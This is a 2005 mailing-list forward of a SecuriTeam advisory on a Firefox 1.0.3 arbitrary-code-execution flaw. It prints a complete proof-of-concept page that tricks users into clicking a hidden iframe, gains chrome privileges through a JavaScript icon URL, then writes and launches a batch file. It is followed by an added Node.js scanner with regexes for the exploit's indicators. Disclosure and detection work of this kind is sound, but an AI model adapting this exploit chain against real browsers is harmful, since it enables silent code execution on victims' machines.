[eside-ghost] Fw: [EXPL] Mozilla Firefox Arbitrary Code Execution
(Exploit)
txipi
txipi en sindominio.net
Tue May 10 19:56:24 CEST 2005
Hi!
The exploit...
Begin forwarded message:
Date: 10 May 2005 13:15:28 +0200
From: SecuriTeam <support en securiteam.com>
To: list en securiteam.com
Subject: [EXPL] Mozilla Firefox Arbitrary Code Execution (Exploit)
The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com
Mozilla Firefox Arbitrary Code Execution (Exploit)
------------------------------------------------------------------------
SUMMARY
Mozilla Firefox (originally known as Phoenix and briefly as Mozilla
Firebird) is "a free, cross-platform, graphical web browser developed by
the Mozilla Foundation and hundreds of volunteers".
Two vulnerabilities have been discovered in Firefox which, combined, can be
exploited by malicious people to run malicious code on vulnerable systems
and compromise their integrity.
DETAILS
Vulnerable Systems:
* Mozilla Firefox version 1.0.3
This proof of concept involves exploiting two flaws:
1) Tricking Firefox into thinking a software installation is being
triggered by a whitelisted site, by using a trusted URL stored in the
frame's session history.
2) The software installation trigger not sufficiently checking image (icon)
URLs, which may contain JavaScript code.
Workaround:
Disable software installation (Web Features panel of the
Options/Preferences window in Firefox 1.0.3 or the Content panel in the
latest trunk builds).
Vendor Status:
The Mozilla Foundation patched (partially) this issue on the server side
by adding random letters and numbers to the install function, which will
prevent this exploit from working. We anticipate that the Mozilla
Foundation will release a Firefox 1.0.4 update shortly.
Exploit:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Firefox Full Remote Compromise</title>
</head>
<body>
Click anywhere inside this page to compromise your system!<br>
Don't worry. Only a harmless batch file will be run. View the source if you don't believe me ;)<br>
Like I said in my Internet Explorer Auto-SP2 RC analysis, nothing is perfect. Breaking something, or if you're the hacker, building something, only requires patience and a little bit of spare time.<br> <br>
Greetz to Mikx, Michael Evanchik, and the entire Mozilla team. This is a very nice browser you guys have put together!
<iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\') { window.name=\'stealcookies\'; } else { event= { target:{ href: \'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'} }; install(event, \'You are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\'); file = Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.interfaces.nsILocalFile); file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\'); file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420); outputStream = Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].createInstance( Components.interfaces.nsIFileOutputStream ); outputStream.init(file,0x04|0x08|0x20,420,0); output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO If I wasnt so nice, this could have been a virus...\\\\\\\\nPAUSE\\\\\\\'; outputStream.write(output,output.length); outputStream.close(); file.launch();\\\')\'); }') + '</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&application=firefox\' style=\'cursor:default;\'> </'+'a>'"
  id="targetframe" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"
  style="position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px; padding:0px; -moz-opacity:0"></iframe>
<script language="JavaScript" type="text/javascript">
// Keep the (invisible) iframe under the mouse pointer so any click lands on it.
document.onmousemove = function trackMouse(e) {
  document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
  document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}
var counter = 0;
// Called on each load of the iframe: first focus it, then send it back in history.
function loader() {
  counter++
  if(counter == 1) {
    stealcookies.focus()
  } else if(counter == 2) {
    stealcookies.history.go(-1)
    //targetframe.style.display="none";
  }
}
</script>
</body>
</html>
Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=292691 (limited access)
ADDITIONAL INFORMATION
The information has been provided by tuytumadre en att.net.
The original article can be found at:
http://greyhatsecurity.org/vulntests/ffrc.htm
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.
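From the defender's side, an added example (not code from the advisory, the PoC author or Mozilla): a Node.js content scanner that flags the indicators the forwarded PoC relies on, namely an install() call whose icon argument is a javascript: URL (flaw 2), a chrome-privilege request inside a javascript: URL, a near-invisible javascript: iframe, and a history.go(-1) after a visit to the whitelisted update site (flaw 1). The indicator names and both sample pages are constructed for this example.

```javascript
// Added example, not code from the advisory, the PoC author or Mozilla: a content
// scanner for the pattern the PoC uses, suitable for logging at a proxy or mail gateway.
// Indicator names and both sample pages below are constructed for illustration.

// Strip the backslash escaping that nests javascript: URLs inside each other in the
// PoC and collapse whitespace, so the inner calls become searchable as plain text.
function normalize(html) {
  return html.replace(/\\+(['"])/g, "$1").replace(/\s+/g, " ");
}

const CHECKS = [
  // Flaw 2: install() given a javascript: URL as its icon (third) argument.
  { id: "install-icon-javascript-url",
    re: /install\s*\(\s*[^,]+,\s*(['"])[^'"]*\1\s*,\s*['"]\s*javascript:/i },
  // Web content asking for chrome privileges from inside a javascript: URL.
  { id: "enablePrivilege-in-javascript-url",
    re: /javascript:[\s\S]*?PrivilegeManager\s*\.\s*enablePrivilege\s*\(\s*['"]UniversalXPConnect['"]/i },
  // A near-invisible iframe whose document is a javascript: URL (the mouse-tracking frame).
  { id: "hidden-javascript-iframe",
    re: /<iframe[\s\S]*?src\s*=\s*["']javascript:[\s\S]*?-moz-opacity\s*:\s*0[\s\S]*?<\/iframe>/i },
  // Flaw 1: the frame is sent back in history after loading the whitelisted site.
  { id: "history-back-after-whitelisted-site",
    re: /update\.mozilla\.org[\s\S]*?history\.go\(\s*-1\s*\)/i },
];

// Returns the ids of all indicators present in the page source.
function scanForInstallAbuse(html) {
  const text = normalize(html);
  return CHECKS.filter(c => c.re.test(text)).map(c => c.id);
}

// Constructed sample: the skeleton of the PoC with the batch-file payload removed.
const SAMPLE_PAGE = String.raw`<iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\') { window.name=\'stealcookies\'; } else { event={ target:{ href: \'http://example.invalid/addon.xpi\'} }; install(event, \'You are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\'); file.launch();\\\')\'); }') + '</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220\'> </'+'a>'" id="targetframe" style="position:absolute; width:6px; height:6px; -moz-opacity:0"></iframe>
<script>var counter = 0; function loader() { counter++; if (counter == 1) { stealcookies.focus() } else { stealcookies.history.go(-1) } }</script>`;

// Constructed benign page: links to the same whitelisted site without any of the tricks.
const BENIGN_PAGE = '<html><body><a href="https://addons.update.mozilla.org/extensions/moreinfo.php?id=220">FlashGot</a><img src="http://example.invalid/icon.png"></body></html>';

console.log(scanForInstallAbuse(SAMPLE_PAGE)); // the four indicator ids above
console.log(scanForInstallAbuse(BENIGN_PAGE)); // []
```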
--
Agur
txipi
wget -O - http://sindominio.net/~txipi/txipi.gpg.asc | gpg --import
Key fingerprint = CCAF 9676 B049 997A 96D6 4D7C 3529 5545 4375 1BF4
Another war ... must it always be so? How many comrades have we lost
in this way? ... Obedience. Duty. Death, and more death ...
-- Romulan Commander, "Balance of Terror", stardate 1709.2